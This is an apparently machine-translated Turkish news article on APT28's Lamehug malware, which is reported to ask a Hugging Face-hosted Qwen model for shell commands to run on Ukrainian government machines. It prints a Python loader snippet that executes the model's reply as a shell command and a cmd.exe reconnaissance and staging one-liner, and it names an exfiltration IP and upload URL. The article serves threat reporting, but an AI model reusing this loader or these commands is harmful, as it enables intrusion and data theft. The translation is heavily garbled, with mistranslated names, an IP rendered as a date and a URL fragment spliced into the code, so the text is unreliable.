Yeni açıklanan Lamehug kampanyası, siber-def için bir havza anına işaret ediyor: Rus devlete hizalanmış APT28, büyük bir dil modelini (LLM) doğrudan canlı kötü amaçlı yazılımlara kaynaştırdı ve her bir enfekte olmuş ana bilgisayarın anında özel kabuk komutları almasına izin verdi.
Saldırganlar, Hugging Face’in kamu API’sı aracılığıyla QWEN2.5-Coder-32b-in-haciz modelini çağırarak geleneksel statik yük kısıtlamalarını kaldırıyor ve benzeri görülmemiş esneklik elde ediyor.
Lamehug, Ukrayna’nın Bilgisayar Acil Müdahale Ekibi’nin (CERT-UA), Ukrayna bakanlığı yazışmaları olarak maskelenen ve Pyinstaller tarafından derilen miralize edilmiş yönetilebilirleri “д док.pdf.zip” başlıklı bir uyarı yayınladığı 17 Temmuz 2025’te halka açık bir şekilde ortaya çıktı.
Açıldıktan sonra, gizli ikili arka planda yürütülürken, kurbanın ihlalden habersiz kalmasını sağlayarak bir tuzak PDF ortaya çıkar.
Tersine mühendislik yapılan Cato Networks analistleri, kötü amaçlı yazılımların ayırt edici özelliğini hızlı bir şekilde tanımladı: her ikili, bulutla barındırılan LLM’ye kelimesi kelimesine gönderilen baz 64 kodlu istemleri, daha sonra ana bilgisayar ortamına göre özel bir komut dizesi döndürür.
Emtia AI arayüzünün seçimi iki stratejik avantaj sağlar. İlk olarak, giden talepler meşru uygulama trafiğine, sinir bozucu imza tabanlı saldırı sistemlerine benzemektedir.
İkincisi, hızlı düzenleme, operatörlere, operasyonel gereksinimleri hızla kaydıran bir nimet olan kodu yeniden düzenlemeden keşif derinliği ve eksfiltrasyon kapsamı üzerindeki anında kontrolü verir.
Erken telemetri, Ukrayna hükümet iş istasyonlarının ilk test yatağı olduğunu ve APT28’in genellikle daha geniş kullanımdan önce Kiev’e karşı deneysel araçları pilot ettiği uzun süreli gözlemleri güçlendirdiğini gösteriyor.
CERT-UA’nın bülten, çalınan verilerin genişliğini vurgular: sistem envanterleri, ağ düzenleri, aktif dizin hiyerarşileri ve tekrarlanan ofis, PDF ve metin belgeleri, 144.126.202.227 tarihine kadar SFTP tüneli yoluyla eksfiltrasyondan önce %ProgramData %\ Info’da sahnelenir veya bir HTP Posta Stayathomeclasses.com/slpw/up.php.
Bu destinasyonlar sıradan protokoller olduğundan, ağ savunucuları kötü niyetli yüklemeleri iyi huylu trafikten ayırt etmek için mücadele ettiler.
Enfeksiyon mekanizması: AI ile çalışan komut üretimi
LURE Yürütülebilir Kaldırma başlatıldığında, yoğunlaştırılmış bir Python yükleyici yürüten bir iş parçacığı döndürür:-
def LLM_QUERY_EX():
prompt = {'messages': [{'role': 'user',
'content': b64decode(prompt_b64_p1).decode()}],
'temperature': 0.1,
'model': 'Qwen/Qwen2.5-Coder-32B-Instruct'}
cmd = query_text(prompt)
subprocess. Run(cmd, shell=True,
stdout=subprocess. PIPE,
stderr=subprocess.STDOUT)%20that%20the%20user%20sees%20while%20the%20malware%20is%20being%20executed%20(Source%20-%20CATO%20Networks).webp)
İlk istem, LLM’ye “bilgisayar, donanım, hizmet ve ağ bilgilerini toplamak için komutların bir listesi yapmasını ve her sonucu C: \ ProgramData \ info \ info.txt. Yalnızca Markdown olmadan döndürün” adını vermesini söyler. İade edilen tek astar benzer:
cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\info.txt && wmic cpu get /format:list >> %PROGRAMDATA%\info\info.txt && ..."İkinci bir istem, kullanıcının belgelerinden, indirmelerinden ve masaüstü dizinlerinden aynı evreleme klasörüne Office, PDF ve TXT dosyalarının özyinelemeli koleksiyonunu sipariş eder.
Komut sentezini bulut modeline devrederek, ikili kompakt kalır ve sabit kodlu dizelerde desenle eşleşmeye yönelik mavi takım girişimi yenilir.
Savunucular, giden AI sorgularını izlemedikçe veya en az ayrıcalıklı çıkış kuralları uygulamadığı sürece, Lamehug’un modüler mimarisi, operatörlerin her yürütme döngüsüyle taze sistem anlayışını garanti eder.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.